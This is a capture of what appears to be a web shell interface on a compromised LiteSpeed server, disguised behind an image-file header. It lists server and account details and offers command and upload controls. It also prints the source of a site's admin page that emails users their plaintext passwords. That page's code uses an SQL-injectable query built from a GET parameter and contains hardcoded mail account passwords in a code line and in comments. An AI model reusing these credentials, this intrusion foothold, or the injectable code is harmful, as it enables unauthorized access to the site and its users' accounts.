����JFIF��x�x������Exif��MM�*���� ����E���J����������������(������������������
Server IP : 103.191.208.227 / Your IP : 18.119.110.76 Web Server : LiteSpeed System : Linux emphasis.herosite.pro 4.18.0-553.8.1.lve.el8.x86_64 #1 SMP Thu Jul 4 16:24:39 UTC 2024 x86_64 User : mhmsfzcs ( 1485) PHP Version : 8.1.31 Disable Function : show_source, system, shell_exec, passthru, exec MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home/mhmsfzcs/vflyorions.com/.well-known/../../www/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php include "db.php"; include "job/admin_header.php"; include "admin_sidebar.php"; if(isset($_GET['edit'])){ $id=$_GET['edit']; $query1="SELECT * FROM profile WHERE id='$id'"; $result = $conn->query($query1); $row=$result->fetch_assoc(); $id=$row['id']; $username=$row['username']; $password=$row['password']; $status=$row['status']; $targetdate=$row['targetdate']; } if(isset($_POST['send'])){ $id=$_POST['id']; date_default_timezone_set('Asia/Kolkata'); $time =date('h:i:s', time ()); $targetdate=$_POST['targetdate']; $email=$_POST['username']; $password=$_POST['password']; $to = $email ; // this is your Email address $from = "dataentrywork@vflyorions.in"; // this is the sender's Email address // mail pass=DataEntry@2023 new creatwed dataentrywork@vflyorions.in $subject = "Vflyorions Technology"; $subject2 = " Data Entry User Work Details"; $htmlContent = ' <!doctype html> <html> <head> </head> <body> <p style="color:Black;font-size:18px;align="justify"><b>This is your login details. You can use your credential and login the panel.</b> <br> <b>Username :</b> '.$email.'<br><b>Password :</b> '.$password.'<br> <b>This is Your Data Entry Work Website Link, Click here And login ,Using above mentioned Email and Paasword :</b>https://vflyorions.in/work/job/login.php<br><br> This is Our Company Official Website Link :https://vflyorions.in <br><br> <b>Please read the following instruction carefully.</b></<br><br> We will provide you an image according to your package and you need to Type as it is, No need to change any thing. <br> If you want to edit something you can go on edit option and you can edit the form from there.<br> If you fail to submit the form in the sequence , the project will be rejected.<br> After the completion of your work you need to go on ALL DATA tab and need to click on csv tab .And you need to mail that CSV format only. You need to save file as you have been received .<br> All file name should be given same as it is on the image file name and CSV name.<br> Computer dates should be in Indian standard time zone.<br> Upper case or lower case (caps or small letter) should be typed respectively or else it will be considered under spelling mistakes.<br> All the completed work should be sent to Quality@vflyorions.com before given time. after that Files will not be accepted, No Excuses will be considered here after.<br> Without closing your window you need to make sure that you are loggin out the panel.<br> If by mistake your window get close, you need to make an request on our email id i.e vflyorions@gmail.com . So that we can provide an another access to your work.<br> <br> Thank You !<br> </p> </body> </html>'; // Set content-type header for sending HTML email $headers = "MIME-Version: 1.0" . "\r\n"; $headers .= "Content-type:text/html;charset=UTF-8" . "\r\n"; // Additional headers $headers .= 'From: '.$from ; // $headers2 = "From:" . $to; // $headers = "From:" . $from ; // $headers = "MIME-Version: 1.0" . "\r\n". // "Content-type:text/html;charset=UTF-8" . "\r\n"; // $headers = "From:" . $from; mail($to,$subject,$htmlContent,$headers); //mail($from,$subject2,$message2,$headers2); // sends a copy of the message to the sender // echo "Mail Sent. Thank you " . $first_name . ", we will contact you shortly."; $_SESSION['status']=" Mail Send Succesfully "; $_SESSION['status_code']="success"; // You can also use header('Location: thank_you.php'); to redirect to another page. // require "PHPMailer/PHPMailerAutoload.php"; // function smtpmailer($to, $from, $from_name, $subject, $body) // { // $mail = new PHPMailer(); // $mail->IsSMTP(); // // $mail->SMTPDebug= 3 ; // $mail->SMTPAuth = true; // $mail->SMTPSecure = 'TLS'; // $mail->Host = 'bom1plzcpnl493917.prod.bom1.secureserver.net'; //bom1plzcpnl493917.prod.bom1.secureserver.net mail.vflyorions.com // $mail->Port = 587; //587 465 // $mail->Username = 'hr@vflyorions.com'; //hr@vflyorions.com // $mail->Password = 'Vfly@2021'; //Vfly@2021 // $mail->IsHTML(true); // $mail->From="hr@vflyorions.com"; // $mail->FromName=$from_name; // $mail->Sender=$from; // $mail->AddReplyTo($from, $from_name); // $mail->Subject = $subject; // $mail->Body = $body; // $mail->AddAddress($to); // if(!$mail->Send()) // { // $_SESSION['status']="Oops Something Went Wrong! Please try again"; // $_SESSION['status_code']="error"; // } // else // { // $_SESSION['status']=" Mail Send Succesfully "; // $_SESSION['status_code']="success"; // } // } // $to = $email; // $from ='hr@vflyorions.com'; // $from_name = "Vflyorions Technology"; // $subject = "User Details"; // $body = '<p style="color:Black;font-size:18px;align="justify"><b>This is your login details. You can use your credential and login the panel.</b> <br> // <b>Username :</b> '.$email.'<br><b>Password :</b> '.$password.'<br> // Website:https://www.vflyorions.com/<br><br> // <b>Please read the following instruction carefully.</b></<br><br> // We will provide you an image according to your package and you need to Type as it is, No need to change any thing. <br> // If you want to edit something you can go on edit option and you can edit the form from there.<br> // If you fail to submit the form in the sequence , the project will be rejected.<br> // After the completion of your work you need to go on ALL DATA tab and need to click on csv tab .And you need to mail that CSV format only. // You need to save file as you have been received .<br> // All file name should be given same as it is on the image file name and CSV name.<br> // Computer dates should be in Indian standard time zone.<br> // Upper case or lower case (caps or small letter) should be typed respectively or else it will be considered under spelling mistakes.<br> // All the completed work should be sent to Quality@vflyorions.com before given time. after that Files will not be accepted, No Excuses will be considered here after.<br> // Without closing your window you need to make sure that you are loggin out the panel.<br> // If by mistake your window get close, you need to make an request on our email id i.e vflyorions@gmail.com . So that we can provide an another access to your work.<br> // <br> Thank You !<br> // </p> '; // $error=smtpmailer($to,$from, $from_name ,$subject, $body); // echo $error; } ?> <main id="main" class="main"> <div class="pagetitle"> <h1>Details</h1> <nav> <ol class="breadcrumb"> <li class="breadcrumb-item"><a href="">Home</a></li> <li class="breadcrumb-item active">Dashboard</li> </ol> </nav> </div> <!-- End Page Title --> <section class="section dashboard"> <div class="row"> <!-- Left side columns --> <div class="col-lg-12"> <div class="row"> <div class="col-sm-3"> </div> <!-- Sales Card --> <div class="col-sm-6" > <div class="card info-card sales-card" style="height: 400px;"> <div class="card-body"> <div class="card-title"> <h4 style="font-family: Times New Roman;font-size:25px; text-align: center;"><b>Send Mail</b></h4> </div> <div class="card-body"> <form method="post" enctype="multipart/form-data" > <div class="row mb-3"> <div class="form-group" > <label>Email Id :</label> <input name="username" type="email" class="form-control" value="<?php echo $username; ?>" readonly> <input name="id" type="hidden" class="form-control" value="<?php echo $id; ?>" > </div> </div> <div class="row mb-3"> <div class="form-group"> <label>Password</label> <input name="password" type="text" class="form-control" value="<?php echo $password; ?>" readonly> </div> </div> <div class="row mb-3"> <div class="form-group" > <label>End Date :</label> <input name="targetdate" type="text" class="form-control" value="<?php echo $targetdate; ?>" min="1997-01-01" max="2030-12-31" readonly> </div> </div> <div class="text-center"> <button type="submit" name="send" class="btn btn-primary" style="background-image: linear-gradient( 99.4deg, rgba(247,0,0,1) 0.8%, rgba(10,35,104,1) 99.4% );">Send</button> </div> </form> </div> </div> </div> </div> <!-- End Sales Card --> <!-- Customers Card --> <div class="col-sm-3"> </div> </div> </div> <!-- End Customers Card --> </div> </div><!-- End Left side columns --> </div> </section> </main> <!-- End #main --> <script src="https://cdnjs.cloudflare.com/ajax/libs/sweetalert/2.1.2/sweetalert.min.js" integrity="sha512-AA1Bzp5Q0K1KanKKmvN/4d3IRKVlv9PYgwFPvm32nPO6QS8yH1HO7LbgB1pgiOxPtfeg5zEn2ba64MUcqJx6CA==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>+ <script src="https://unpkg.com/sweetalert/dist/sweetalert.min.js"></script> <?php if(isset($_SESSION['status']) && $_SESSION['status']!='') { ?> <script> new swal({ title: "<?php echo $_SESSION['status'];?>", //text: "You clicked the button!", icon: "<?php echo $_SESSION['status_code'];?>", button: "OK", }).then(function() { window.location = "currently_workinguser_details.php"; }); </script> <?php unset($_SESSION['status']); } ?> <?php if(isset($_SESSION['status1']) && $_SESSION['status1']!='') { ?> <script> new swal({ title: "<?php echo $_SESSION['status1'];?>", //text: "You clicked the button!", icon: "<?php echo $_SESSION['status_code1'];?>", button: "OK", }); </script> <?php unset($_SESSION['status1']); } include "footer.php"; ?>